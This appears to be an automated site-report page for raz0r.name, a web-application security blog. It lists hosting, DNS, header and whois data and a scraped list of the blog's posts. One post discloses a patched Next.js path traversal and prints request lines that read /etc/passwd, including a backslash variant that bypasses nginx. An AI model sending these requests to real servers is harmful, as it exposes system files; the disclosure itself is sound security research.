raz0r.name Report


  • Alexa global ranking: # 1,200,513; Alexa ranking in Russia: # 137,589

    Server:nginx...
    X-Powered-By:PHP/5.6.36

    Main IP address: 37.140.192.245, Server location: Russian Federation, Moscow, ISP: Reg.Ru Hosting, TLD: name, CountryCode: RU

    Description: a blog about information security and web interface vulnerabilities...

    This report was updated on 03-Jul-2018

Technical data of the raz0r.name


GeoIP provides information such as latitude, longitude and ISP (Internet Service Provider). Our GeoIP service located the host raz0r.name: it is currently hosted in the Russian Federation and its service provider is Reg.Ru Hosting.

Latitude: 55.752220153809
Longitude: 37.615558624268
Country: Russian Federation (RU)
City: Moscow
Region: Moscow City
ISP: Reg.Ru Hosting

HTTP Header Analysis


HTTP header information is the part of the HTTP protocol that a user's browser sends to the web server (here nginx), containing the details of what the browser wants and will accept back from the web server.

X-XSS-Protection:1; mode=block
X-Content-Type-Options:nosniff
X-Powered-By:PHP/5.6.36
Transfer-Encoding:chunked
Set-Cookie:bb2_screener_=1530606780+45.33.85.57+45.33.85.57; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=-1530606779; path=/
Strict-Transport-Security:max-age=31536000; includeSubDomains
Vary:Accept-Encoding
Server:nginx
Connection:keep-alive
Link:; rel="https://api.w.org/", ; rel=shortlink
Date:Tue, 03 Jul 2018 08:33:01 GMT
X-Frame-Options:SAMEORIGIN
Content-Type:text/html; charset=UTF-8
Content-Encoding:gzip

DNS

soa:server42.hosting.reg.ru. support.reg.ru. 2018041801 10800 3600 604800 86400
txt:"v=spf1 include:_spf.google.com ~all"
ns:ns2.hosting.reg.ru.
ns1.hosting.reg.ru.
ipv4:IP:37.140.192.245
ASN:197695
OWNER:AS-REG, RU
Country:RU
mx:MX preference = 10, mail exchanger = ALT3.ASPMX.L.GOOGLE.COM.
MX preference = 10, mail exchanger = ALT4.ASPMX.L.GOOGLE.COM.
MX preference = 5, mail exchanger = ALT1.ASPMX.L.GOOGLE.COM.
MX preference = 1, mail exchanger = ASPMX.L.GOOGLE.COM.
MX preference = 5, mail exchanger = ALT2.ASPMX.L.GOOGLE.COM.

HtmlToText

raz0r.name — Web Application Security Blog

Predicting Random Numbers in Ethereum Smart Contracts
1 February 2018 | Talks | raz0r | 0 comments | Tags: blockchain, ethereum, security, smart contracts

Slides from my AppSec California 2018 talk "Predicting Random Numbers in Ethereum Smart Contracts". Detailed blog post: https://blog.positive.com/predicting-random-numbers-in-ethereum-smart-contracts-e5358c6b8620

--

Looting GraphQL Endpoints for Fun and Profit
8 June 2017 | Articles | raz0r | 3 comments | Tags: graphql, javascript, rpc, security

In one of the previous posts about the state of modern web application security I mentioned GraphQL – a new technology for building APIs developed by Facebook. GraphQL is rapidly gaining popularity, and more and more services are switching to this technology, both web and mobile applications. Some of the GraphQL users are: GitHub, Shopify, Pinterest, HackerOne and many more. You can find many posts on the internet about GraphQL's benefits and advantages over a classic REST API, but there is not much information about GraphQL security considerations. In this post I would like to elaborate on GraphQL: how it works, what the weak points are, how an attacker can abuse them, and which tools can be used.

--

Arbitrary File Reading in Next.js < 2.4.1
2 June 2017 | Vulnerabilities | raz0r | 0 comments | Tags: javascript, nextjs, react

Next.js is quite a popular (>13k stars on GitHub) framework for server-rendered React applications. It includes a Node.js server which allows HTML pages to be rendered dynamically. While digging into the server's code, a list of internal routes drew my attention:

    defineRoutes () {
      const routes = {
        /* ... */
        '/_next/:path+': async (req, res, params) => {
          const p = join(__dirname, '..', 'client', ...(params.path || []))
          await this.serveStatic(req, res, p)
        },
        '/static/:path+': async (req, res, params) => {
          const p = join(this.dir, 'static', ...(params.path || []))
          await this.serveStatic(req, res, p)
        }
        /* ... */
      }

As you can see, you can pass an arbitrary path into the serveStatic() function via the /_next/ and /static/ endpoints:

    export function serveStatic (req, res, path) {
      return new Promise((resolve, reject) => {
        send(req, path)
        .on('directory', () => {
          // We don't allow directories to be read.
          const err = new Error('No directory access')
          err.code = 'ENOENT'
          reject(err)
        })
        .on('error', reject)
        .pipe(res)
        .on('finish', resolve)
      })
    }

This function just pipes the contents of files into the output without any validation or restrictions. So, we can try to perform a path traversal:

    GET /_next/../../../../../../../../../etc/passwd HTTP/1.1

And it works! However, Node.js application servers are usually deployed behind nginx. Due to path normalization in nginx we cannot just use forward slashes and dots; nginx will return a Bad Request error code. Luckily, the Node.js server transforms backslashes into forward slashes, so we can bypass nginx validation.

    GET /_next\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1

Zeit, the company which develops Next.js, was very quick to respond and roll out the patch. Be sure to update to the latest version.

--

Database Firewall from Scratch
25 May 2017 | Talks | raz0r | 1 comment | Tags: mysql, phdays, sql-injection, waf, security

Slides from our talk with Denis Kolegov at PHDays 7 "Database Firewall from Scratch" (+ bonus).

Database Firewall from Scratch from Denis Kolegov

--

postMessage Security in Chrome Extensions
4 April 2017 | Talks | raz0r | 0 comments | Tags: chrome, javascript, owasp, rce, xss

Slides from my talk at the OWASP London meetup on the 30th of March, 2017. Video. CRX postMessage scanner source code.

--

Universal (Isomorphic) Web Applications Security
1 February 2017 | Articles | raz0r | 3 comments | Tags: javascript, react, redux, security

Nowadays you do not write things in jQuery. You use Node.js, webpack, React, Redux, WebSockets, Babel and a ton of other packages to help you create a basic todo web application. With frontend technologies developing rapidly, isomorphic (or, to be correct, universal) web applications are a big thing now. In a nutshell, it means that you can write code in JavaScript which can be run both on the server and on the client side with reusable components, validators and shared state. Lovely, isn't it? As a frontend developer you would say that it definitely is. A security guy would argue, since the approach is extremely unsafe for your data.

--

Waf.js: How to Protect Web Applications Using JavaScript
25 May 2016 | Talks | raz0r | 0 comments | Tags: burp, csrf, dom, javascript, phdays, waf, xss, security

Waf.js: How to Protect Web Applications Using JavaScript from Denis Kolegov

--

Overview of Client-Side Attacks Using CSS
1 September 2015 | Articles | raz0r | 1 comment | Tags: css, firefox, ie, rpo, xss

CSS (Cascading Style Sheets) is a markup language for styling the appearance of web pages, separating visual presentation from content. The first specification of the format was published by the W3C in 1996. Back then CSS allowed only the simplest things: coloring a block of text, setting text in italics, aligning a paragraph, drawing a border. Today CSS has become so complex that frameworks (Bootstrap, jQuery UI) and metalanguages (Sass, SCSS, Less) are created for it, which simplify writing styles by raising the level of abstraction of CSS. The rapid development of CSS attracted the attention of security researchers, which resulted in a number of techniques for attacking the client in order to steal personal data: CSRF tokens, browsing history, lists of email contacts, and so on. Let us begin the overview with the classic vectors that have not yet lost their relevance.

--

Webinar on Recognizing Bots Using Machine Learning
26 July 2015 | News | raz0r | 0 comments | This post has no tags.

On Wednesday at 19:00, my colleague Andrey Zavgorodniy and I are holding a webinar "Recognizing bot activity using machine learning algorithms". We look forward to seeing everyone who is interested in machine learning and beyond. And yes, we are still looking for web security specialists, hackers, and those who are interested not only in breaking but also in defending, for research work on the PT Application Firewall project. Write to my email: [email protected]

--

Positive Technologies Is Urgently Looking for Web Hackers of Various Skill Levels
23 January 2014 | News | raz0r | 4 comments | This post has no tags.

First of all, we are interested in your practical experience in this area, not the number of lines in your résumé. Articles in blogs and on forums or in Xakep magazine, and participation in CTFs or bug bounty programs, are welcome.

Technical wishes: practical skills in compromising and protecting web applications; programming experience in any of the following languages is desirable: Java, C#/VB (ASP, ASP.NET), PHP, Python, Ruby (most in demand: Java, C#/VB), SQL; your own developments and research, including work published on thematic forums and in blogs; published data on vulnerabilities you have discovered.

Tasks we offer: security analysis of web applications and remote banking systems of leading Russian and foreign companies; conducting penetration tests, taking part in the department's research activities, attending and taking part in Russian and international conferences; taking part in organizing the Positive Hack Days conference; the opportunity to conduct your own research in information security; work in a team of recognized information security experts.

Conditions: official ("white") salary; voluntary health insurance; 6 weeks of paid vacation. We can offer work in the company's Moscow and St. Petersburg offices, as well as remotely. Send résumés and questions to [email protected]

URL analysis for raz0r.name


http://raz0r.name/wp-content/uploads/2015/07/687474703a2f2f75706c6f61642e77696b696d656469612e6f72672f77696b6970656469612f656e2f7468756d622f612f61362f42656e6465725f526f6472696775657a2e706e672f32323070782d42656e6465725f526f6472696775657a2e706e67.png
https://raz0r.name/articles/universal-isomorphic-web-applications-security/#more-706
https://raz0r.name/tag/malware/
https://raz0r.name/2009/01/
https://raz0r.name/tag/smart-contracts/
https://raz0r.name/obzory/top-10-luchshix-onlajn-servisov-po-rasshifrovke-xeshej/#comment-229857
https://raz0r.name/tag/ssrf/
https://raz0r.name/2009/02/
https://raz0r.name/category/talks/
https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/
https://raz0r.name/tag/fuzzing/
https://raz0r.name/2009/05/
https://raz0r.name/tag/phpbb/
https://raz0r.name/tag/burp/
https://raz0r.name/tag/zeronights/

Whois Information


Whois is a protocol that provides access to registration information. It shows when the website was registered, when it will expire, and the contact details of the site. In a nutshell, it includes the following information:



Registry Domain ID: 3527984_DOMAIN_NAME-VRSN
Domain Name: RAZ0R.NAME
Registrar: REGISTRAR OF DOMAIN NAMES REG.RU LLC
Registrar IANA ID: 1606
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

>>> Last update of whois database: 2018-02-08T18:21:24Z <<<

For more information on Whois status codes, please visit https://icann.org/epp


  REFERRER http://www.nic.name/

  REGISTRAR Global Name Registry

SERVERS

  SERVER name.whois-servers.net

  ARGS raz0r.name

  PORT 43

  TYPE domain

DOMAIN

  HANDLE 3527984_DOMAIN_NAME-VRSN

  NAME raz0r.name

STATUS
clientTransferProhibited https://icann.org/epp#clientTransferProhibited

NSERVER

  NS1.HOSTING.REG.RU 31.31.196.34

  NS2.HOSTING.REG.RU 31.31.194.3

  REGISTERED yes


Mistakes


The following list shows possible spelling mistakes that internet users might make when searching for the website.
